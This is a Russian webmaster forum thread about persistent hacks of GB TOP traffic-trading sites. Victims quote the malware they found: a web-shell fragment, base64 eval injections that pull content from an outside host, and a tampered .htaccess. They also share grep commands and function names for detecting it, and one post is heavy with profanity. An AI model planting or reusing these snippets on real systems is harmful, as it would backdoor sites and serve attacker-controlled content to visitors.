На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 01/02/11 в 21:28 |
Как я понимаю единственным верным решением следует одно - это удаление формы webmasters.php? Нет формы для сабмита - нет взлому. Значит нужно написать скрипт который будет обрабатывать запрос и отправлять его на мыло мастера. Как предложил J_Geer:. Идея отличная только как статитику проверять трейдеры будут? Еще бы не плохо капчу конечно и еще фишки какие нибудь прикрутить.
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
|
С нами с 20.07.05
Сообщения: 315
Рейтинг: 407
|
Добавлено: 02/02/11 в 00:43 |
Со статистикой пока сам не придумал... хотя кое-кто ее и не давал, видел такое... А капча в моей форме есть, попробуй, может понравится скриптик...
|
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 02/02/11 в 18:30 |
J_Geer: На мультинишевом как быть надо бы две формы одна для однонишевых другая для мультинишевых
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
|
С нами с 20.07.05
Сообщения: 315
Рейтинг: 407
|
Добавлено: 02/02/11 в 21:07 |
Ну так для универсальности просто еще одно поле добавить - категории. Не сообразил сразу. Добавлю по наличию времени.
По поводу взлома. Сказка не закончилась. Вчера чисто случайно залез на одном из виртуалов в папку с картинками на чисто HTML'ьном сайтике вовсе без GB TOPа на домене, и обнаружил там outclick.php (22,7 кб):
Код: [развернуть] |
$auth_pass = "af0209exxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; #root
$color = "#df5";
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","\ |
и т.д. Пролез по остальным доменам на этом виртуале, и обнаружил, что ВСЕ индекс.php всех скриптов либо заинклужены кодом:
Код: [развернуть] |
eval(base64_decode('JGZpbGUgPSBAaW1wbG9kZSgiIixmaWxlKCJodHRwOi8vY3J2LmNjL2NjP2M9Ii4kX1NFUlZFUlsnUkVNT1RFX0FERFInXSkpOyBlY2hvICRmaWxlOw==')); |
или
Код: [развернуть] |
eval(base64_decode('JGNoID0gY3VybF9pbml0ICgpOwpjdXJsX3NldG9wdCAoJGNoICwgQ1VSTE9QVF9VUkwgLCAiaHR0cDovL2Nydi5jYy9jYy8/Yz0iLiRfU0VSVkVSWydSRU1PVEVfQUREUiddKTsKY3VybF9zZXRvcHQgKCRjaCAsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIgLCAxICk7CiRnZXRjYyA9IGN1cmxfZXhlYygkY2gpOwpjdXJsX2Nsb3NlKCRjaCk7CmVjaG8gJGdldGNjOw==')); |
, причем не обязательно в конце файла, либо подменены на кодированную хрень размером 22,7 или 36,3 кб. При этом скрипты работали. Но особенно мне не понравился тот момент, что все файлы стояли под chmod 444, а зенденые индексы FET CJ оказались дезендеными с выше указанным инклудом.Кроме того, при очередной проверке топов нашел несколько подмененных htaccess'ов (99 байт вместо 112):
Код: [развернуть] |
php_flag register_globals On
AddHandler application/x-httpd-php .php .htm .html .phtml .shtml .dat |
в memberfiles, datafiles(его там, по-моему вообще не должно быть) и backup GB TOP'ов.
Логично предположить, что следующий трипер будет сидеть уже в любых, в т.ч. и dat файлах, не только php.
У кого дедики/вдски - попробуйте прогнать из под шелла (первый ключ - латинское эль маленькое, не латинское И большое!)
grep -l -r PathDenyFilter *
grep -l -r auth_pass *
grep -l -r ftpaccess *
grep -l -r '$default_action = "FilesMan"' *
grep -l -r 'php_flag register_globals On' *
grep -l -r 'AddHandler application/x-httpd-php' *
, и просмотрите содержимое выданных файлов. Если что-то отыщете типа выше приведенного, погоняйте еще по разным кускам своего кода.
На всякий случай: grep работает "сверху вниз", т.е. при старте из /home ищется во всех апаках ниже ее и в ней самой, если стартуете из / - ищется во всех файлах.
|
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 02/02/11 в 22:19 |
Я вчера проверил еще как. В общем абсолютно все index.php изменены. Размер новых был в районе 20кб хотя должен быть 14кб. Нашел и бэкдор в абсолютно а другом домене не относящихся к топам. Ищите да найдете!
З.Ы. Кстати за все время переполоха ни кто не предложил перейти на DF Lite
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
|
С нами с 20.07.05
Сообщения: 315
Рейтинг: 407
|
Добавлено: 03/02/11 в 04:14 |
Сделал PHP скрипт для поиска по серверу - для тех, у кого виртуалы без SSH. Кому надо - кину в личку.
Тоже нашел триппер в абсолютно не относящихся к топам доменах.
|
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 03/02/11 в 10:29 |
Мэн мне скинь тоже
|
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 03/02/11 в 19:14 |
Уже воспользовался твоим скриптом. Коненчо муторно добавлять трейдеров, но зато безопасно. Что хотелось бы внести по этому поводу:
Упорядочить как в админке на добавление, те:
domain
url
Banner
category
Title
Desc
Mail
И подобное...
И коненчо возможность вносить ниши. По идее рулесы не нужны. Количесвто символов лучше не ограничивать конкретно в майле ,баннерах и урлах. А вот проверку на допустимость симолов лучше сделать, чтобы не сабмитили скажем там %^&*+" и прочее
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 03/02/11 в 21:20 |
Сука! Гандон! Пидор! Опять! Бляяяять! Как? Только вчера все вычистил сука, все пароли поменял.. Урод чтоб у тебя хуй отсох! Бля гад отъебись по человечески прошу!
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
|
zeustraffic.com
С нами с 08.11.02
Сообщения: 3232
Рейтинг: 2611
|
Добавлено: 03/02/11 в 21:32 |
CrazyMen писал: | Кстати за все время переполоха ни кто не предложил перейти на DF Lite |
Lite не поддерживает, кроме всего прочего, безресетники, которые у большинства на гб. Кстати, если кто-то вдруг решит перейти на дф, могу поделиться готовым решением, значительно облегчающим переход (как-то преходилось переносить базы с гб).
|
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 03/02/11 в 21:35 |
Zeus: Спасибо! Если что будем знать!
Последний раз редактировалось: CrazyMen (04/02/11 в 07:22), всего редактировалось 1 раз
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
|
С нами с 19.10.05
Сообщения: 351
Рейтинг: 755
|
Добавлено: 03/02/11 в 22:46 |
мало того ин по ауту у него нету следовательно накрутить элементарно. или уже умеет?
|
|
|
|
С нами с 20.07.05
Сообщения: 315
Рейтинг: 407
|
Добавлено: 03/02/11 в 23:44 |
CrazyMen: кинул в личку...
|
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 04/02/11 в 07:23 |
J_Geer: В про версии вроде считает все.
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
|
С нами с 01.04.07
Сообщения: 4378
Рейтинг: 2970
|
Добавлено: 04/02/11 в 10:09 |
CrazyMen писал: | Уже воспользовался твоим скриптом. Коненчо муторно добавлять трейдеров, но зато безопасно. |
Бесполезно это всё
Шелл сидит на сервере и прятать форму добавления бессмысленно.
J_Geer писал: | У кого дедики/вдски - попробуйте прогнать из под шелла (первый ключ - латинское эль маленькое, не латинское И большое!) |
Ещё нужно искать:
eval
base64_decode
unpack
system
exec
passthru
shell_exec
popen
...
и ещё куча вариантов, в т.ч. и закрытые енкодерами скрипты, которые вообще не поймаешь
|
|
|
|
I love suicidegirls.com ;-)
С нами с 27.10.04
Сообщения: 7060
Рейтинг: 2819
|
Добавлено: 04/02/11 в 10:50 |
Те кого постоянно ломают попробуйте топы поднять на новом хосте (базу только перенесите), и через свою форму сабмиты принимайте. А то не понимаю вашей тяги постоянно чинить и чистить. Если уже третий месяц все ломают нужно уже что то делать. Я вот заметил уже у некоторых пока сабмит форма закрыта. Надеюсь временно, пока все чин чинарем не заработает.
|
|
|
|
С нами с 20.07.05
Сообщения: 315
Рейтинг: 407
|
Добавлено: 04/02/11 в 11:41 |
Проблема уже не в топах... Все это дерьмо рассеивается по всему серверу независимо от скрипта. И индексы подменялись в любых скриптах. Где-то сидит зараза, чистки и смена паролей на помогают. Причем зараза влегкую всовывает файлы в папки с чмодом 555 и влезает в файлы с чмодом 444.
Последний раз редактировалось: J_Geer (04/02/11 в 12:01), всего редактировалось 1 раз
|
|
|
|
I love suicidegirls.com ;-)
С нами с 27.10.04
Сообщения: 7060
Рейтинг: 2819
|
Добавлено: 04/02/11 в 11:58 |
ну вот я и говорю поднимите все на другом сервере. А то 3 месяца заниматься чистками это вредно для нервной системы.
|
|
|
|
С нами с 20.07.05
Сообщения: 315
Рейтинг: 407
|
Добавлено: 04/02/11 в 12:05 |
Хорошее решение )) - поднять 60+ сайтов на другом сервере, тем паче что у меня виртуалы на год почти проплачены... И не факт, что триппер не перетащишь...
|
|
|
|
ябудубудай
С нами с 20.02.07
Сообщения: 722
Рейтинг: 1038
|
Добавлено: 04/02/11 в 18:11 |
CrazyMen писал: | вчера все вычистил сука, все пароли поменял.. Урод чтоб у тебя хуй отсох! Бля гад отъебись по человечески прошу! |
CrazyMen Попробуй действительно перенести хотя бы часть хозяйства на новый сервак! Вот я заметил такую особенность, У меня есть топы скрипта ГБ версии когда еще можно было взломать, так эти топы периодически статистику перекасаебывает, учитывая что скрипт обновлял, а есть топы которые сразу ставил новую версию скрипта, не сырую, делал restore, так с такими топами пока все в порядке, если не хочешь переезжать, удаляй все и настраивай все по новой! А лучшего всего установить скрипт и все ручками забить! П.С. честно тож надоели эти последствия..... ;)
|
|
|
|
I love suicidegirls.com ;-)
С нами с 27.10.04
Сообщения: 7060
Рейтинг: 2819
|
Добавлено: 04/02/11 в 18:36 |
J_Geer: Ну 60 сайтов это не так уж и много, хотя смотря какие сайты там кроме ГБшных топов висят. Лучше уж недельку потратить на перетаскивание, чем 3 месяца на чистки и зачистки и трату нервов. А когда все перетащишь с виртуалов, то попросишь чтобы резетнули тебе они их и можешь там еще сетку топов поднять.
|
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 04/02/11 в 21:16 |
Ох мля и заепся... Конечно перезд на другой сервер дело относительно не сложное, но! При переезде смениться айпи что отразится на СЕО. Возможна потеря информации. Сиджи сдохнут. Может лучше поставить DF Lite, а со временем перейти на Pro? А может действительно скинутся и выпустить самописный?
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
|
С нами с 20.07.05
Сообщения: 315
Рейтинг: 407
|
Добавлено: 04/02/11 в 21:58 |
_4eburek: в соем случае это реально много, т.к. топов там с десяток, а остальное FET'ы, протоны как топовые фрихи, сплоги на разных скриптах, просто фрихи завязанные на сутру, несколько белых сайтов на разных скриптах и туева хуча галер... так что это вовсе не неделька получится...
|
|
|
|
С нами с 20.07.05
Сообщения: 315
Рейтинг: 407
|
Добавлено: 04/02/11 в 23:29 |
CrazyMen писал: | А может действительно скинутся и выпустить самописный? |
Ну так чисто топы прекрасно живут и на TE, протоновских клонах, FetCJ...
|
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 06/02/11 в 15:10 |
J_Geer: Это как? Там же нет учета статистики за 7 дней?
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
|